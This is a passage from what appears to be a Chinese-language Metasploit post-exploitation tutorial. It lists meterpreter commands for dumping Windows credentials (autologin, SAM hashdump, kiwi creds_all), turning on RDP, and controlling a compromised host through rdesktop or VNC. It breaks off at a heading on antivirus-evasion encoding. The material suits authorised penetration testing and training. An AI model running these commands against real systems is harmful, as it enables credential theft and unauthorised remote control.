1、抓取自动登录账户密码
run windows/gather/credentials/windows_autologin
2、导出SAM数据库本地账户密码文件
run post/windows/gather/smart_hashdump
3、导出密码哈希
run hashdump
4、使用kiwi模块获取
load kiwi
creds_all:列举所有凭据
七、后渗透远程监控
1、使用rdesktop远程控制(直接在终端执行)
rdesktop常用参数
参数描述-u用户名-p密码-a 16指使用16位色显示远程桌面-f全屏模式(用Ctrl+Alt+Enter组合键退出)-g设置分辨率,如:-g 1024x768-h帮助例子:
rdesktop -u 用户名 -p 密码 -f IP地址
如果远程计算机没有启动远程功能,可以在meterpreter中输入
run post/windows/manage/enable_rdp命令开启远程功能
2、通过vnc远程(在meterpreter中执行)
run vnc
八、msf编码免杀